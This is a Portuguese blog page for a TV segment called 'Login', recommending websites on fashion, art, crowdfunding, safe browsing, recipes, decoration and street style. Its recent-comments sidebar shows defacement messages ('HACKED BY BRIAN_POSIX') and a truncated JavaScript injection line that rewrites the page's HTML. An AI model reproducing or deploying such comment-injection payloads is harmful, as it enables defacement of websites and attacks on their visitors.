Login @ 18:34

Ter, 03/07/12

Sabia que agora já pode circular pelas principais lojas em Paris e no Mundo, vivendo uma experiência única?!

Sara Andrade estará connosco, para nos explicar tudo, no espaço das novidades virtuais, a rubrica "Login".

http://www.modewalk.com/

http://pt.brandsbreeze.com/

http://www.net-a-porter.com/

http://www.mrporter.com/

http://www.theoutnet.com/


Tags:


Login @ 18:34

Ter, 05/06/12

Gostava de descobrir os melhores endereços para ter uma agenda e roteiros fabulosos para os seus dias?!

 

Vai descobrir onde , com Sara Andrade e o nosso "Login."!


Tags:


Login @ 18:33

Ter, 15/05/12

O site http://www.googleartproject.com/ e a ideia do Google foi aplicar a tecnologia do Google Earth a museus, permitindo que, do conforto da tua casa, pudesses visitar alguns dos mais conceituados museus espalhados pelo mundo, entre os quais o tate, o MOnA, etc. E no meio deles, está também o português, Museu Berardo.

http://www.artspan.com/ - um site que é uma diretoria com artistas que vai desde fotógrafos a joalheiros. É um Google da arte, permite-te pesquisar por categoria ou região, por palavras-chave... É um portal para os websites de alguns dos maiores artistas e não só.

http://www.artbusiness.com/artsite.html - website com artigos assinados por Alan bamberger, um consultor de arte que já apareceu na CNN e etc, e que coloca aqui diversos conceitos para quem faz arte e compra arte. É muito completo e tem artigos interessantes, como os melhores sites de arte no ciberespaço.

http://www.zhibit.org/ - é um website que funciona como host (anfitrião) do teu site: se és um artista e queres expor online as tuas obras, vender, promover, etc, eles fornecem as ferramentas e o domínio, etc, para concretizares. E isso é feito dentro de uma comunidade já artística.

 




Tags:


Login @ 18:31

Ter, 03/04/12

É uma tendência - há cada vez mais marcas mainstream a optarem por esta via -, e cada vez mais pessoas a optarem por um estilo de vida mais biológico e sem adição de químicos.

 

A principal preocupação quando se opta por este tipo de produtos é saberes que tudo o que estás a por na pele não tem ingredientes dúbios ou não-naturais.

 

Mas os produtos que são certificadamente orgânicos não são assim tão fáceis de encontrar.


Tags:


Login @ 18:33

Ter, 06/03/12

Kickstarter é um novo modo de conseguir financiamentos para seu projeto.

Criado por  Perry Chen, Yancey Strickler, Charles Adler, Carson Baker e Lance Ivy, 5 amigos moradores do Brooklyn, o Kickstarter é mais uma vitrine de ideias onde você pode colocar seus projetos. Produtores de conteúdo, jornalistas, designers, curadores, promotores, blogueiros, entre diversos outros podem colocar sua ideia no site e inspirar as pessoas a te apoiarem.

O Kickstarter acredita que uma boa idéia, bem comunidade pode se disseminar rápida e amplamente.
Um grande groupo de pessoas podem ser uma tremenda fonte de dinheiro e motivação.

O empreendedor deve criar um projeto no Kickstater e estabelecer uma meta de arrecadação. Ele pode conseguir fundos oferecendo diversos tipos de prémios (visibilidade, ingressos, entrevistas, etc ) aos contribuintes.
Se o empreendedor alcançar a meta até a data estipulada, ele leva o dinheiro para a casa e os contribuintes ganham os prémios, caso contrário ninguém ganha nada.

Você pode fazer ofertas de diversas maneiras: vídeos, textos, imagens ou áudio e receber o retorno financeiro por meio de um cartão de crédito da Amazon. Mas, o dinheiro só é recolhido quando o participante chega a sua meta financeira antes do tempo do projeto expirar na página.


Tags:


Login @ 19:05

Ter, 07/02/12

Na rubrica LOGIN vamos falar sobre dicas e diretrizes para navegar online de forma segura.

Visite os sites e saiba mais sobre navegação segura:

- http://www.internetsegura.pt/ - um site criado no âmbito do programa europeu Safer Internet, impulsionado pelo Ministério da educação. Tem não só as diretrizes sobre prevenção e notícias, mas também a legislação sobre a temática.

- http://www.seguranet.pt/blog/ - também criado no âmbito do programa europeu safer internet, mas mais dirigido à área da educação: escola, pais, professores, alunos.

- http://www.getsafeonline.org/ - é internacional, mas tem artigos sobre situações específicas, como ser burlado em bilhetes.

- http://www.wikihow.com/Be-Safe-on-the-Internet - artigo feito com os mesmo parâmetros da wikipedia – foi editado por 112 pessoas, mas compreende 15 regras básicas que ajuda a ficar com uma lista dos principais pontos a ter em conta.

Não perca ainda o LOGIN E LOGOUT


Tags:


Login @ 19:11

Ter, 03/01/12

O Natal pode ter-se revelado uma época de excessos. Mas o novo ano não tem que começar com o apertar do cinto literal. Em vez da resolução de passar um mês a saladas, descubra opções que têm tanto de delicioso na apresentação como na degustação com algumas sugestões de blogues com receitas e fotografias do passo a passo de pratos onde pode controlar os ingredientes.

 

Para que possa fazer da sua sala de jantar um Chez Moi com estrelas Michelin... Ou quase!

 

http://www.nigella.com/

http://www.jamieoliver.com/

http://www.ingredientesecreto.tv/

http://www.two-tarts.com/

http://cupcakesandcashmere.com/

http://notwithoutsalt.com/

http://www.theknead4speed.com/

http://nesrinecookingmania.blogspot.com/

http://www.pipandebby.com/

http://www.beckybakes.net/

http://www.whatmegansmaking.com/

http://www.sevenspoons.net/

http://www.joythebaker.com/blog/

http://www.receitasecomida.com/


Tags:


Login @ 18:32

Ter, 06/12/11

Se o início de Dezembro marcou a inauguração das decorações natalícias lá de casa, e ainda assim sente que lhe falta o remate perfeito, não perca alguns sites com boas soluções de decoração – de Natal ou não.

 

- http://zug.pt/ - é uma loja portuguesa que funciona muito à base de impressões/prints e tem uma particular variedade de vinil para paredes muito interessante. Tem também postais, telas, posters e nesta altura tem uma oferta destes numa categoria natalícia que é muito original.

 

- http://www.finnishdesignshop.com/ - É uma loja que tem vários artigos de design, se a pessoa estiver à procura de opções com silhuetas mais sofisticadas para a decoração natalícia. Eles trabalham com muitas lojas/marcas, pelo que é um mundo de opções.

 

- http://loja.inexistencia.com/ - lembro-me que a inexistência foi das primeiras lojas nacionais em Portugal a inaugurar um sítio de venda de decoração sem que existisse a priori uma loja física. A selecção deles de artigos para casa é muito boa, com marcas de topo, e, embora não tenham criado uma categoria específica para o Natal, como o fizeram outros sites, têm boas opções para complementar decorações festivas.

 

- http://www.dutchbydesign.com/ - loja de decoração mais acessível, com opções engraçadas em decoração, originais. Não é muito minimalista e oferece opções divertidas e coloridas para quem prefere uma decoração mais animada.

 

- http://www.vertigo-store.com/ - a Vertigo é uma loja física no Porto que tem também a sua vertente no on-line. Vende todo o tipo de artigos para casa, pautados pela originalidade e dignos de colecionadores, e, embora não tenha particular colecção de objectos natalícios, tem boas ideias para prendas originais.


Tags:


Login @ 18:34

Ter, 08/11/11

Na aproximação das Festas, fica a sugestão de links para prendas originais e a com preços para todos os bolsos. Comunidades de vendedores independentes vendem aqui os artigos que imaginam, criando assim um mercado/feira online que se traduz numa boa alternativa para quem compra, mas também para quem quer vender ou escoar itens de um negócio próprio.

 

Os links:

 

http://www.etsy.com/

http://www.artfire.com/

http://www.poppytalkhandmade.com/ 

http://en.dawanda.com/

http://www.clubefashion.com/


Tags:


Login @ 18:18

Ter, 13/09/11

Cada vez mais, a curiosidade pelas celebridades e a passadeira vermelha está a estagnar e a vontade de beber inspiração do estilo outras pessoas com vidas e quotidianos mais semelhantes ao nosso está a aumentar.

 

1- em destaque, do Alfaiate Lisboeta (porque é o nosso – oalfaiatelisboeta.blogspot.com) e das suas consequentes versões estrangeiras:

 

2- do site renovado da www.garancedore.fr

 

3- do site renovado do thesartorialist.com;

 

4- do Stockholm streetstyle (http://carolinesmode.com/stockholmstreetstyle/);

 

5 - e do http://streetfsn.blogspot.com/.

 

 

O culto do estilo está cada vez mais a passar para rostos do dia-a-dia em vez dos já habituais nomes célebres.

Os blogues de street style proliferam e a versão portuguesa é já de grande referência.

 


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO